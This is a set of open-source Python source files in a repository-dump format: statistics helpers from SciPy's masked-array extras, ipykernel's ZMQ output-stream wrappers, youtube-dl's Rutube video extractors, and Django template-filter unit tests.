hd[1,i] = np.dot(w, (xsorted-hd_mean)**2)
#
hd[0, prob == 0] = xsorted[0]
hd[0, prob == 1] = xsorted[-1]
if var:
hd[1, prob == 0] = hd[1, prob == 1] = np.nan
return hd
return hd[0]
# Initialization & checks
data = ma.array(data, copy=False, dtype=float_)
p = np.array(prob, copy=False, ndmin=1)
# Computes quantiles along axis (or globally)
if (axis is None) or (data.ndim == 1):
result = _hd_1D(data, p, var)
else:
if data.ndim > 2:
raise ValueError("Array 'data' must be at most two dimensional, "
"but got data.ndim = %d" % data.ndim)
result = ma.apply_along_axis(_hd_1D, axis, data, p, var)
return ma.fix_invalid(result, copy=False)
def hdmedian(data, axis=-1, var=False):
"""
Returns the Harrell-Davis estimate of the median along the given axis.
Parameters
----------
data : ndarray
Data array.
axis : int, optional
Axis along which to compute the quantiles. If None, use a flattened
array.
var : bool, optional
Whether to return the variance of the estimate.
"""
result = hdquantiles(data,[0.5], axis=axis, var=var)
return result.squeeze()
def hdquantiles_sd(data, prob=list([.25,.5,.75]), axis=None):
"""
The standard error of the Harrell-Davis quantile estimates by jackknife.
Parameters
----------
data : array_like
Data array.
prob : sequence, optional
Sequence of quantiles to compute.
axis : int, optional
Axis along which to compute the quantiles. If None, use a flattened
array.
Returns
-------
hdquantiles_sd : MaskedArray
Standard error of the Harrell-Davis quantile estimates.
"""
def _hdsd_1D(data,prob):
"Computes the std error for 1D arrays."
xsorted = np.sort(data.compressed())
n = len(xsorted)
#.........
hdsd = np.empty(len(prob), float_)
if n < 2:
hdsd.flat = np.nan
vv = np.arange(n) / float(n-1)
betacdf = beta.cdf
for (i,p) in enumerate(prob):
_w = betacdf(vv, (n+1)*p, (n+1)*(1-p))
w = _w[1:] - _w[:-1]
mx_ = np.fromiter([np.dot(w,xsorted[np.r_[list(range(0,k)),
list(range(k+1,n))].astype(int_)])
for k in range(n)], dtype=float_)
mx_var = np.array(mx_.var(), copy=False, ndmin=1) * n / float(n-1)
hdsd[i] = float(n-1) * np.sqrt(np.diag(mx_var).diagonal() / float(n))
return hdsd
# Initialization & checks
data = ma.array(data, copy=False, dtype=float_)
p = np.array(prob, copy=False, ndmin=1)
# Computes quantiles along axis (or globally)
if (axis is None):
result = _hdsd_1D(data, p)
else:
if data.ndim > 2:
raise ValueError("Array 'data' must be at most two dimensional, "
"but got data.ndim = %d" % data.ndim)
result = ma.apply_along_axis(_hdsd_1D, axis, data, p)
return ma.fix_invalid(result, copy=False).ravel()
def trimmed_mean_ci(data, limits=(0.2,0.2), inclusive=(True,True),
alpha=0.05, axis=None):
"""
Selected confidence interval of the trimmed mean along the given axis.
Parameters
----------
data : array_like
Input data.
limits : {None, tuple}, optional
None or a two item tuple.
Tuple of the percentages to cut on each side of the array, with respect
to the number of unmasked data, as floats between 0. and 1. If ``n``
is the number of unmasked data before trimming, then
(``n * limits[0]``)th smallest data and (``n * limits[1]``)th
largest data are masked. The total number of unmasked data after
trimming is ``n * (1. - sum(limits))``.
The value of one limit can be set to None to indicate an open interval.
Defaults to (0.2, 0.2).
inclusive : (2,) tuple of boolean, optional
If relative==False, tuple indicating whether values exactly equal to
the absolute limits are allowed.
If relative==True, tuple indicating whether the number of data being
masked on each side should be rounded (True) or truncated (False).
Defaults to (True, True).
alpha : float, optional
Confidence level of the intervals.
Defaults to 0.05.
axis : int, optional
Axis along which to cut. If None, uses a flattened version of `data`.
Defaults to None.
Returns
-------
trimmed_mean_ci : (2,) ndarray
The lower and upper confidence intervals of the trimmed data.
"""
data = ma.array(data, copy=False)
trimmed = mstats.trimr(data, limits=limits, inclusive=inclusive, axis=axis)
tmean = trimmed.mean(axis)
tstde = mstats.trimmed_stde(data,limits=limits,inclusive=inclusive,axis=axis)
df = trimmed.count(axis) - 1
tppf = t.ppf(1-alpha/2.,df)
return np.array((tmean - tppf*tstde, tmean+tppf*tstde))
def mjci(data, prob=[0.25,0.5,0.75], axis=None):
"""
Returns the Maritz-Jarrett estimators of the standard error of selected
experimental quantiles of the data.
Parameters
----------
data : ndarray
Data array.
prob : sequence, optional
Sequence of quantiles to compute.
axis : int or None, optional
Axis along which to compute the quantiles. If None, use a flattened
array.
"""
def _mjci_1D(data, p):
data = np.sort(data.compressed())
n = data.size
prob = (np.array(p) * n + 0.5).astype(int_)
betacdf = beta.cdf
mj = np.empty(len(prob), float_)
x = np.arange(1,n+1, dtype=float_) / n
y = x - 1./n
for (i,m) in enumerate(prob):
W = betacdf(x,m-1,n-m) - betacdf(y,m-1,n-m)
C1 = np.dot(W,data)
C2 = np.dot(W,data**2)
mj[i] = np.sqrt(C2 - C1**2)
return mj
data = ma.array(data, copy=False)
if data.ndim > 2:
raise ValueError("Array 'data' must be at most two dimensional, "
"but got data.ndim = %d" % data.ndim)
p = np.array(prob, copy=False, ndmin=1)
# Computes quantiles along axis (or globally)
if (axis is None):
return _mjci_1D(data, p)
else:
return ma.apply_along_axis(_mjci_1D, axis, data, p)
def mquantiles_cimj(data, prob=[0.25,0.50,0.75], alpha=0.05, axis=None):
"""
Computes the alpha confidence interval for the selected quantiles of the
data, with Maritz-Jarrett estimators.
Parameters
----------
data : ndarray
Data array.
prob : sequence, optional
Sequence of quantiles to compute.
alpha : float, optional
Confidence level of the intervals.
axis : int or None, optional
Axis along which to compute the quantiles.
If None, use a flattened array.
"""
alpha = min(alpha, 1-alpha)
z = norm.ppf(1-alpha/2.)
xq = mstats.mquantiles(data, prob, alphap=0, betap=0, axis=axis)
smj = mjci(data, prob, axis=axis)
return (xq - z * smj, xq + z * smj)
def median_cihs(data, alpha=0.05, axis=None):
"""
Computes the alpha-level confidence interval for the median of the data.
Uses the Hettmasperger-Sheather method.
Parameters
----------
data : array_like
Input data. Masked values are discarded. The input should be 1D only,
or `axis` should be set to None.
alpha : float, optional
Confidence level of the intervals.
axis : int or None, optional
Axis along which to compute the quantiles. If None, use a flattened
array.
Returns
-------
median_cihs
Alpha level confidence interval.
"""
def _cihs_1D(data, alpha):
data = np.sort(data.compressed())
n = len(data)
alpha = min(alpha, 1-alpha)
k = int(binom._ppf(alpha/2., n, 0.5))
gk = binom.cdf(n-k,n,0.5) - binom.cdf(k-1,n,0.5)
if gk < 1-alpha:
k -= 1
gk = binom.cdf(n-k,n,0.5) - binom.cdf(k-1,n,0.5)
gkk = binom.cdf(n-k-1,n,0.5) - binom.cdf(k,n,0.5)
I = (gk - 1 + alpha)/(gk - gkk)
lambd = (n-k) * I / float(k + (n-2*k)*I)
lims = (lambd*data[k] + (1-lambd)*data[k-1],
lambd*data[n-k-1] + (1-lambd)*data[n-k])
return lims
data = ma.rray(data, copy=False)
# Computes quantiles along axis (or globally)
if (axis is None):
result = _cihs_1D(data.compressed(), alpha)
else:
if data.ndim > 2:
raise ValueError("Array 'data' must be at most two dimensional, "
"but got data.ndim = %d" % data.ndim)
result = ma.apply_along_axis(_cihs_1D, axis, data, alpha)
return result
def compare_medians_ms(group_1, group_2, axis=None):
"""
Compares the medians from two independent groups along the given axis.
The comparison is performed using the McKean-Schrader estimate of the
standard error of the medians.
Parameters
----------
group_1 : array_like
First dataset.
group_2 : array_like
Second dataset.
axis : int, optional
Axis along which the medians are estimated. If None, the arrays are
flattened. If `axis` is not None, then `group_1` and `group_2`
should have the same shape.
Returns
-------
compare_medians_ms : {float, ndarray}
If `axis` is None, then returns a float, otherwise returns a 1-D
ndarray of floats with a length equal to the length of `group_1`
along `axis`.
"""
(med_1, med_2) = (ma.median(group_1,axis=axis), ma.median(group_2,axis=axis))
(std_1, std_2) = (mstats.stde_median(group_1, axis=axis),
mstats.stde_median(group_2, axis=axis))
W = np.abs(med_1 - med_2) / ma.sqrt(std_1**2 + std_2**2)
return 1 - norm.cdf(W)
def idealfourths(data, axis=None):
"""
Returns an estimate of the lower and upper quartiles.
Uses the ideal fourths algorithm.
Parameters
----------
data : array_like
Input array.
axis : int, optional
Axis along which the quartiles are estimated. If None, the arrays are
flattened.
Returns
-------
idealfourths : {list of floats, masked array}
Returns the two internal values that divide `data` into four parts
using the ideal fourths algorithm either along the flattened array
(if `axis` is None) or along `axis` of `data`.
"""
def _idf(data):
x = data.compressed()
n = len(x)
if n < 3:
return [np.nan,np.nan]
(j,h) = divmod(n/4. + 5/12.,1)
j = int(j)
qlo = (1-h)*x[j-1] + h*x[j]
k = n - j
qup = (1-h)*x[k] + h*x[k-1]
return [qlo, qup]
data = ma.sort(data, axis=axis).view(MaskedArray)
if (axis is None):
return _idf(data)
else:
return ma.apply_along_axis(_idf, axis, data)
def rsh(data, points=None):
"""
Evaluates Rosenblatt's shifted histogram estimators for each point
on the dataset 'data'.
Parameters
----------
data : sequence
Input data. Masked values are ignored.
points : sequence or None, optional
Sequence of points where to evaluate Rosenblatt shifted histogram.
If None, use the data.
"""
data = ma.array(data, copy=False)
if points is None:
points = data
else:
points = np.array(points, copy=False, ndmin=1)
if data.ndim != 1:
raise AttributeError("The input array should be 1D only !")
n = data.count()
r = idealfourths(data, axis=None)
h = 1.2 * (r[-1]-r[0]) / n**(1./5)
nhi = (data[:,None] <= points[None,:] + h).sum(0)
nlo = (data[:,None] < points[None,:] - h).sum(0)
return (nhi-nlo) / (2.*n*h)
| bsd-3-clause |
kenshay/ImageScript | ProgramData/SystemFiles/Python/Lib/site-packages/ipykernel/iostream.py | 5 | 13790 | # coding: utf-8
"""Wrappers for forwarding stdout/stderr over zmq"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
import atexit
from binascii import b2a_hex
import os
import sys
import threading
import warnings
from io import StringIO, UnsupportedOperation
import zmq
from zmq.eventloop.ioloop import IOLoop
from zmq.eventloop.zmqstream import ZMQStream
from jupyter_client.session import extract_header
from ipython_genutils import py3compat
from ipython_genutils.py3compat import unicode_type
#-----------------------------------------------------------------------------
# Globals
#-----------------------------------------------------------------------------
MASTER = 0
CHILD = 1
#-----------------------------------------------------------------------------
# IO classes
#-----------------------------------------------------------------------------
class IOPubThread(object):
"""An object for sending IOPub messages in a background thread
Prevents a blocking main thread from delaying output from threads.
IOPubThread(pub_socket).background_socket is a Socket-API-providing object
whose IO is always run in a thread.
"""
def __init__(self, socket, pipe=False):
"""Create IOPub thread
Parameters
----------
socket: zmq.PUB Socket
the socket on which messages will be sent.
pipe: bool
Whether this process should listen for IOPub messages
piped from subprocesses.
"""
self.socket = socket
self.background_socket = BackgroundSocket(self)
self._master_pid = os.getpid()
self._pipe_flag = pipe
self.io_loop = IOLoop()
if pipe:
self._setup_pipe_in()
self._local = threading.local()
self._events = {}
self._setup_event_pipe()
self.thread = threading.Thread(target=self._thread_main)
self.thread.daemon = True
def _thread_main(self):
"""The inner loop that's actually run in a thread"""
self.io_loop.start()
self.io_loop.close()
if hasattr(self._local, 'event_pipe'):
self._local.event_pipe.close()
def _setup_event_pipe(self):
"""Create the PULL socket listening for events that should fire in this thread."""
ctx = self.socket.context
pipe_in = ctx.socket(zmq.PULL)
pipe_in.linger = 0
_uuid = b2a_hex(os.urandom(16)).decode('ascii')
iface = self._event_interface = 'inproc://%s' % _uuid
pipe_in.bind(iface)
self._event_puller = ZMQStream(pipe_in, self.io_loop)
self._event_puller.on_recv(self._handle_event)
@property
def _event_pipe(self):
"""thread-local event pipe for signaling events that should be processed in the thread"""
try:
event_pipe = self._local.event_pipe
except AttributeError:
# new thread, new event pipe
ctx = self.socket.context
event_pipe = ctx.socket(zmq.PUSH)
event_pipe.linger = 0
event_pipe.connect(self._event_interface)
self._local.event_pipe = event_pipe
return event_pipe
def _handle_event(self, msg):
"""Handle an event on the event pipe"""
event_id = msg[0]
event_f = self._events.pop(event_id)
event_f()
def _setup_pipe_in(self):
"""setup listening pipe for IOPub from forked subprocesses"""
ctx = self.socket.context
# use UUID to authenticate pipe messages
self._pipe_uuid = os.urandom(16)
pipe_in = ctx.socket(zmq.PULL)
pipe_in.linger = 0
try:
self._pipe_port = pipe_in.bind_to_random_port("tcp://127.0.0.1")
except zmq.ZMQError as e:
warnings.warn("Couldn't bind IOPub Pipe to 127.0.0.1: %s" % e +
"\nsubprocess output will be unavailable."
)
self._pipe_flag = False
pipe_in.close()
return
self._pipe_in = ZMQStream(pipe_in, self.io_loop)
self._pipe_in.on_recv(self._handle_pipe_msg)
def _handle_pipe_msg(self, msg):
"""handle a pipe message from a subprocess"""
if not self._pipe_flag or not self._is_master_process():
return
if msg[0] != self._pipe_uuid:
print("Bad pipe message: %s", msg, file=sys.__stderr__)
return
self.send_multipart(msg[1:])
def _setup_pipe_out(self):
# must be new context after fork
ctx = zmq.Context()
pipe_out = ctx.socket(zmq.PUSH)
pipe_out.linger = 3000 # 3s timeout for pipe_out sends before discarding the message
pipe_out.connect("tcp://127.0.0.1:%i" % self._pipe_port)
return ctx, pipe_out
def _is_master_process(self):
return os.getpid() == self._master_pid
def _check_mp_mode(self):
"""check for forks, and switch to zmq pipeline if necessary"""
if not self._pipe_flag or self._is_master_process():
return MASTER
else:
return CHILD
def start(self):
"""Start the IOPub thread"""
self.thread.start()
# make sure we don't prevent process exit
# I'm not sure why setting daemon=True above isn't enough, but it doesn't appear to be.
atexit.register(self.stop)
def stop(self):
"""Stop the IOPub thread"""
if not self.thread.is_alive():
return
self.io_loop.add_callback(self.io_loop.stop)
self.thread.join()
def close(self):
self.socket.close()
self.socket = None
@property
def closed(self):
return self.socket is None
def schedule(self, f):
"""Schedule a function to be called in our IO thread.
If the thread is not running, call immediately.
"""
if self.thread.is_alive():
event_id = os.urandom(16)
while event_id in self._events:
event_id = os.urandom(16)
self._events[event_id] = f
self._event_pipe.send(event_id)
else:
f()
def send_multipart(self, *args, **kwargs):
"""send_multipart schedules actual zmq send in my thread.
If my thread isn't running (e.g. forked process), send immediately.
"""
self.schedule(lambda : self._really_send(*args, **kwargs))
def _really_send(self, msg, *args, **kwargs):
"""The callback that actually sends messages"""
mp_mode = self._check_mp_mode()
if mp_mode != CHILD:
# we are master, do a regular send
self.socket.send_multipart(msg, *args, **kwargs)
else:
# we are a child, pipe to master
# new context/socket for every pipe-out
# since forks don't teardown politely, use ctx.term to ensure send has completed
ctx, pipe_out = self._setup_pipe_out()
pipe_out.send_multipart([self._pipe_uuid] + msg, *args, **kwargs)
pipe_out.close()
ctx.term()
class BackgroundSocket(object):
"""Wrapper around IOPub thread that provides zmq send[_multipart]"""
io_thread = None
def __init__(self, io_thread):
self.io_thread = io_thread
def __getattr__(self, attr):
"""Wrap socket attr access for backward-compatibility"""
if attr.startswith('__') and attr.endswith('__'):
# don't wrap magic methods
super(BackgroundSocket, self).__getattr__(attr)
if hasattr(self.io_thread.socket, attr):
warnings.warn("Accessing zmq Socket attribute %s on BackgroundSocket" % attr,
DeprecationWarning, stacklevel=2)
return getattr(self.io_thread.socket, attr)
super(BackgroundSocket, self).__getattr__(attr)
def __setattr__(self, attr, value):
if attr == 'io_thread' or (attr.startswith('__' and attr.endswith('__'))):
super(BackgroundSocket, self).__setattr__(attr, value)
else:
warnings.warn("Setting zmq Socket attribute %s on BackgroundSocket" % attr,
DeprecationWarning, stacklevel=2)
setattr(self.io_thread.socket, attr, value)
def send(self, msg, *args, **kwargs):
return self.send_multipart([msg], *args, **kwargs)
def send_multipart(self, *args, **kwargs):
"""Schedule send in IO thread"""
return self.io_thread.send_multipart(*args, **kwargs)
class OutStream(object):
"""A file like object that publishes the stream to a 0MQ PUB socket.
Output is handed off to an IO Thread
"""
# The time interval between automatic flushes, in seconds.
flush_interval = 0.2
topic=None
def __init__(self, session, pub_thread, name, pipe=None):
if pipe is not None:
warnings.warn("pipe argument to OutStream is deprecated and ignored",
DeprecationWarning)
self.encoding = 'UTF-8'
# This is necessary for compatibility with Python built-in streams
self.errors = None
self.session = session
if not isinstance(pub_thread, IOPubThread):
# Backward-compat: given socket, not thread. Wrap in a thread.
warnings.warn("OutStream should be created with IOPubThread, not %r" % pub_thread,
DeprecationWarning, stacklevel=2)
pub_thread = IOPubThread(pub_thread)
pub_thread.start()
self.pub_thread = pub_thread
self.name = name
self.topic = b'stream.' + py3compat.cast_bytes(name)
self.parent_header = {}
self._master_pid = os.getpid()
self._flush_pending = False
self._io_loop = pub_thread.io_loop
self._new_buffer()
def _is_master_process(self):
return os.getpid() == self._master_pid
def set_parent(self, parent):
self.parent_header = extract_header(parent)
def close(self):
self.pub_thread = None
@property
def closed(self):
return self.pub_thread is None
def _schedule_flush(self):
"""schedule a flush in the IO thread
call this on write, to indicate that flush should be called soon.
"""
if self._flush_pending:
return
self._flush_pending = True
# add_timeout has to be handed to the io thread via event pipe
def _schedule_in_thread():
self._io_loop.call_later(self.flush_interval, self._flush)
self.pub_thread.schedule(_schedule_in_thread)
def flush(self):
"""trigger actual zmq send
send will happen in the background thread
"""
if self.pub_thread.thread.is_alive():
# wait for flush to actually get through:
self.pub_thread.schedule(self._flush)
evt = threading.Event()
self.pub_thread.schedule(evt.set)
evt.wait()
else:
self._flush()
def _flush(self):
"""This is where the actual send happens.
_flush should generally be called in the IO thread,
unless the thread has been destroyed (e.g. forked subprocess).
"""
self._flush_pending = False
data = self._flush_buffer()
if data:
# FIXME: this disables Session's fork-safe check,
# since pub_thread is itself fork-safe.
# There should be a better way to do this.
self.session.pid = os.getpid()
content = {u'name':self.name, u'text':data}
self.session.send(self.pub_thread, u'stream', content=content,
parent=self.parent_header, ident=self.topic)
def isatty(self):
return False
def __next__(self):
raise IOError('Read not supported on a write only stream.')
if not py3compat.PY3:
next = __next__
def read(self, size=-1):
raise IOError('Read not supported on a write only stream.')
def readline(self, size=-1):
raise IOError('Read not supported on a write only stream.')
def fileno(self):
raise UnsupportedOperation("IOStream has no fileno.")
def write(self, string):
if self.pub_thread is None:
raise ValueError('I/O operation on closed file')
else:
# Make sure that we're handling unicode
if not isinstance(string, unicode_type):
string = string.decode(self.encoding, 'replace')
is_child = (not self._is_master_process())
# only touch the buffer in the IO thread to avoid races
self.pub_thread.schedule(lambda : self._buffer.write(string))
if is_child:
# newlines imply flush in subprocesses
# mp.Pool cannot be trusted to flush promptly (or ever),
# and this helps.
if '\n' in string:
self.flush()
else:
self._schedule_flush()
def writelines(self, sequence):
if self.pub_thread is None:
raise ValueError('I/O operation on closed file')
else:
for string in sequence:
self.write(string)
def _flush_buffer(self):
"""clear the current buffer and return the current buffer data.
This should only be called in the IO thread.
"""
data = u''
if self._buffer is not None:
buf = self._buffer
self._new_buffer()
data = buf.getvalue()
buf.close()
return data
def _new_buffer(self):
self._buffer = StringIO()
| gpl-3.0 |
coreynicholson/youtube-dl | youtube_dl/extractor/rutube.py | 24 | 6818 | # coding: utf-8
from __future__ import unicode_literals
import re
import itertools
from .common import InfoExtractor
from ..compat import (
compat_str,
)
from ..utils import (
determine_ext,
unified_strdate,
)
class RutubeIE(InfoExtractor):
IE_NAME = 'rutube'
IE_DESC = 'Rutube videos'
_VALID_URL = r'https?://rutube\.ru/(?:video|(?:play/)?embed)/(?P<id>[\da-z]{32})'
_TESTS = [{
'url': 'http://rutube.ru/video/3eac3b4561676c17df9132a9a1e62e3e/',
'info_dict': {
'id': '3eac3b4561676c17df9132a9a1e62e3e',
'ext': 'mp4',
'title': 'Раненный кенгуру забежал в аптеку',
'description': 'http://www.ntdtv.ru ',
'duration': 80,
'uploader': 'NTDRussian',
'uploader_id': '29790',
'upload_date': '20131016',
'age_limit': 0,
},
'params': {
# It requires ffmpeg (m3u8 download)
'skip_download': True,
},
}, {
'url': 'http://rutube.ru/play/embed/a10e53b86e8f349080f718582ce4c661',
'only_matching': True,
}, {
'url': 'http://rutube.ru/embed/a10e53b86e8f349080f718582ce4c661',
'only_matching': True,
}]
@staticmethod
def _extract_urls(webpage):
return [mobj.group('url') for mobj in re.finditer(
r'<iframe[^>]+?src=(["\'])(?P<url>(?:https?:)?//rutube\.ru/embed/[\da-z]{32}.*?)\1',
webpage)]
def _real_extract(self, url):
video_id = self._match_id(url)
video = self._download_json(
'http://rutube.ru/api/video/%s/?format=json' % video_id,
video_id, 'Downloading video JSON')
# Some videos don't have the author field
author = video.get('author') or {}
options = self._download_json(
'http://rutube.ru/api/play/options/%s/?format=json' % video_id,
video_id, 'Downloading options JSON')
formats = []
for format_id, format_url in options['video_balancer'].items():
ext = determine_ext(format_url)
if ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
format_url, video_id, 'mp4', m3u8_id=format_id, fatal=False))
elif ext == 'f4m':
formats.extend(self._extract_f4m_formats(
format_url, video_id, f4m_id=format_id, fatal=False))
else:
formats.append({
'url': format_url,
'format_id': format_id,
})
self._sort_formats(formats)
return {
'id': video['id'],
'title': video['title'],
'description': video['description'],
'duration': video['duration'],
'view_count': video['hits'],
'formats': formats,
'thumbnail': video['thumbnail_url'],
'uploader': author.get('name'),
'uploader_id': compat_str(author['id']) if author else None,
'upload_date': unified_strdate(video['created_ts']),
'age_limit': 18 if video['is_adult'] else 0,
}
class RutubeEmbedIE(InfoExtractor):
IE_NAME = 'rutube:embed'
IE_DESC = 'Rutube embedded videos'
_VALID_URL = r'https?://rutube\.ru/(?:video|play)/embed/(?P<id>[0-9]+)'
_TESTS = [{
'url': 'http://rutube.ru/video/embed/6722881?vk_puid37=&vk_puid38=',
'info_dict': {
'id': 'a10e53b86e8f349080f718582ce4c661',
'ext': 'mp4',
'upload_date': '20131223',
'uploader_id': '297833',
'description': 'Видео группы ★http://vk.com/foxkidsreset★ музей Fox Kids и Jetix<br/><br/> восстановлено и сделано в шикоформате subziro89 http://vk.com/subziro89',
'uploader': 'subziro89 ILya',
'title': 'Мистический городок Эйри в Индиан 5 серия озвучка subziro89',
},
'params': {
'skip_download': 'Requires ffmpeg',
},
}, {
'url': 'http://rutube.ru/play/embed/8083783',
'only_matching': True,
}]
def _real_extract(self, url):
embed_id = self._match_id(url)
webpage = self._download_webpage(url, embed_id)
canonical_url = self._html_search_regex(
r'<link\s+rel="canonical"\s+href="([^"]+?)"', webpage,
'Canonical URL')
return self.url_result(canonical_url, 'Rutube')
class RutubeChannelIE(InfoExtractor):
IE_NAME = 'rutube:channel'
IE_DESC = 'Rutube channels'
_VALID_URL = r'https?://rutube\.ru/tags/video/(?P<id>\d+)'
_TESTS = [{
'url': 'http://rutube.ru/tags/video/1800/',
'info_dict': {
'id': '1800',
},
'playlist_mincount': 68,
}]
_PAGE_TEMPLATE = 'http://rutube.ru/api/tags/video/%s/?page=%s&format=json'
def _extract_videos(self, channel_id, channel_title=None):
entries = []
for pagenum in itertools.count(1):
page = self._download_json(
self._PAGE_TEMPLATE % (channel_id, pagenum),
channel_id, 'Downloading page %s' % pagenum)
results = page['results']
if not results:
break
entries.extend(self.url_result(result['video_url'], 'Rutube') for result in results)
if not page['has_next']:
break
return self.playlist_result(entries, channel_id, channel_title)
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
channel_id = mobj.group('id')
return self._extract_videos(channel_id)
class RutubeMovieIE(RutubeChannelIE):
IE_NAME = 'rutube:movie'
IE_DESC = 'Rutube movies'
_VALID_URL = r'https?://rutube\.ru/metainfo/tv/(?P<id>\d+)'
_TESTS = []
_MOVIE_TEMPLATE = 'http://rutube.ru/api/metainfo/tv/%s/?format=json'
_PAGE_TEMPLATE = 'http://rutube.ru/api/metainfo/tv/%s/video?page=%s&format=json'
def _real_extract(self, url):
movie_id = self._match_id(url)
movie = self._download_json(
self._MOVIE_TEMPLATE % movie_id, movie_id,
'Downloading movie JSON')
movie_name = movie['name']
return self._extract_videos(movie_id, movie_name)
class RutubePersonIE(RutubeChannelIE):
IE_NAME = 'rutube:person'
IE_DESC = 'Rutube person videos'
_VALID_URL = r'https?://rutube\.ru/video/person/(?P<id>\d+)'
_TESTS = [{
'url': 'http://rutube.ru/video/person/313878/',
'info_dict': {
'id': '313878',
},
'playlist_mincount': 37,
}]
_PAGE_TEMPLATE = 'http://rutube.ru/api/video/person/%s/?page=%s&format=json'
| unlicense |
bufferapp/buffer-django-nonrel | tests/regressiontests/defaultfilters/tests.py | 49 | 24500 | # -*- coding: utf-8 -*-
import datetime
from django.utils import unittest
from django.template.defaultfilters import *
class DefaultFiltersTests(unittest.TestCase):
def test_floatformat(self):
self.assertEqual(floatformat(7.7), u'7.7')
self.assertEqual(floatformat(7.0), u'7')
self.assertEqual(floatformat(0.7), u'0.7')
self.assertEqual(floatformat(0.07), u'0.1')
self.assertEqual(floatformat(0.007), u'0.0')
self.assertEqual(floatformat(0.0), u'0')
self.assertEqual(floatformat(7.7, 3), u'7.700')
self.assertEqual(floatformat(6.000000, 3), u'6.000')
self.assertEqual(floatformat(6.200000, 3), u'6.200')
self.assertEqual(floatformat(6.200000, -3), u'6.200')
self.assertEqual(floatformat(13.1031, -3), u'13.103')
self.assertEqual(floatformat(11.1197, -2), u'11.12')
self.assertEqual(floatformat(11.0000, -2), u'11')
self.assertEqual(floatformat(11.000001, -2), u'11.00')
self.assertEqual(floatformat(8.2798, 3), u'8.280')
self.assertEqual(floatformat(u'foo'), u'')
self.assertEqual(floatformat(13.1031, u'bar'), u'13.1031')
self.assertEqual(floatformat(18.125, 2), u'18.13')
self.assertEqual(floatformat(u'foo', u'bar'), u'')
self.assertEqual(floatformat(u'¿Cómo esta usted?'), u'')
self.assertEqual(floatformat(None), u'')
# Check that we're not converting to scientific notation.
self.assertEqual(floatformat(0, 6), u'0.000000')
self.assertEqual(floatformat(0, 7), u'0.0000000')
self.assertEqual(floatformat(0, 10), u'0.0000000000')
self.assertEqual(floatformat(0.000000000000000000015, 20),
u'0.00000000000000000002')
pos_inf = float(1e30000)
self.assertEqual(floatformat(pos_inf), unicode(pos_inf))
neg_inf = float(-1e30000)
self.assertEqual(floatformat(neg_inf), unicode(neg_inf))
nan = pos_inf / pos_inf
self.assertEqual(floatformat(nan), unicode(nan))
class FloatWrapper(object):
def __init__(self, value):
self.value = value
def __float__(self):
return self.value
self.assertEqual(floatformat(FloatWrapper(11.000001), -2), u'11.00')
# This fails because of Python's float handling. Floats with many zeroes
# after the decimal point should be passed in as another type such as
# unicode or Decimal.
@unittest.expectedFailure
def test_floatformat_fail(self):
self.assertEqual(floatformat(1.00000000000000015, 16), u'1.0000000000000002')
def test_addslashes(self):
self.assertEqual(addslashes(u'"double quotes" and \'single quotes\''),
u'\\"double quotes\\" and \\\'single quotes\\\'')
self.assertEqual(addslashes(ur'\ : backslashes, too'),
u'\\\\ : backslashes, too')
def test_capfirst(self):
self.assertEqual(capfirst(u'hello world'), u'Hello world')
def test_escapejs(self):
self.assertEqual(escapejs(u'"double quotes" and \'single quotes\''),
u'\\u0022double quotes\\u0022 and \\u0027single quotes\\u0027')
self.assertEqual(escapejs(ur'\ : backslashes, too'),
u'\\u005C : backslashes, too')
self.assertEqual(escapejs(u'and lots of whitespace: \r\n\t\v\f\b'),
u'and lots of whitespace: \\u000D\\u000A\\u0009\\u000B\\u000C\\u0008')
self.assertEqual(escapejs(ur'<script>and this</script>'),
u'\\u003Cscript\\u003Eand this\\u003C/script\\u003E')
self.assertEqual(
escapejs(u'paragraph separator:\u2029and line separator:\u2028'),
u'paragraph separator:\\u2029and line separator:\\u2028')
def test_fix_ampersands(self):
self.assertEqual(fix_ampersands(u'Jack & Jill & Jeroboam'),
u'Jack & Jill & Jeroboam')
def test_linenumbers(self):
self.assertEqual(linenumbers(u'line 1\nline 2'),
u'1. line 1\n2. line 2')
self.assertEqual(linenumbers(u'\n'.join([u'x'] * 10)),
u'01. x\n02. x\n03. x\n04. x\n05. x\n06. x\n07. '\
u'x\n08. x\n09. x\n10. x')
def test_lower(self):
self.assertEqual(lower('TEST'), u'test')
# uppercase E umlaut
self.assertEqual(lower(u'\xcb'), u'\xeb')
def test_make_list(self):
self.assertEqual(make_list('abc'), [u'a', u'b', u'c'])
self.assertEqual(make_list(1234), [u'1', u'2', u'3', u'4'])
def test_slugify(self):
self.assertEqual(slugify(' Jack & Jill like numbers 1,2,3 and 4 and'\
' silly characters ?%.$!/'),
u'jack-jill-like-numbers-123-and-4-and-silly-characters')
self.assertEqual(slugify(u"Un \xe9l\xe9phant \xe0 l'or\xe9e du bois"),
u'un-elephant-a-loree-du-bois')
def test_stringformat(self):
self.assertEqual(stringformat(1, u'03d'), u'001')
self.assertEqual(stringformat(1, u'z'), u'')
def test_title(self):
self.assertEqual(title('a nice title, isn\'t it?'),
u"A Nice Title, Isn't It?")
self.assertEqual(title(u'discoth\xe8que'), u'Discoth\xe8que')
def test_truncatewords(self):
self.assertEqual(
truncatewords(u'A sentence with a few words in it', 1), u'A ...')
self.assertEqual(
truncatewords(u'A sentence with a few words in it', 5),
u'A sentence with a few ...')
self.assertEqual(
truncatewords(u'A sentence with a few words in it', 100),
u'A sentence with a few words in it')
self.assertEqual(
truncatewords(u'A sentence with a few words in it',
'not a number'), u'A sentence with a few words in it')
def test_truncatewords_html(self):
self.assertEqual(truncatewords_html(
u'<p>one <a href="#">two - three <br>four</a> five</p>', 0), u'')
self.assertEqual(truncatewords_html(u'<p>one <a href="#">two - '\
u'three <br>four</a> five</p>', 2),
u'<p>one <a href="#">two ...</a></p>')
self.assertEqual(truncatewords_html(
u'<p>one <a href="#">two - three <br>four</a> five</p>', 4),
u'<p>one <a href="#">two - three <br>four ...</a></p>')
self.assertEqual(truncatewords_html(
u'<p>one <a href="#">two - three <br>four</a> five</p>', 5),
u'<p>one <a href="#">two - three <br>four</a> five</p>')
self.assertEqual(truncatewords_html(
u'<p>one <a href="#">two - three <br>four</a> five</p>', 100),
u'<p>one <a href="#">two - three <br>four</a> five</p>')
self.assertEqual(truncatewords_html(
u'\xc5ngstr\xf6m was here', 1), u'\xc5ngstr\xf6m ...')
def test_upper(self):
self.assertEqual(upper(u'Mixed case input'), u'MIXED CASE INPUT')
# lowercase e umlaut
self.assertEqual(upper(u'\xeb'), u'\xcb')
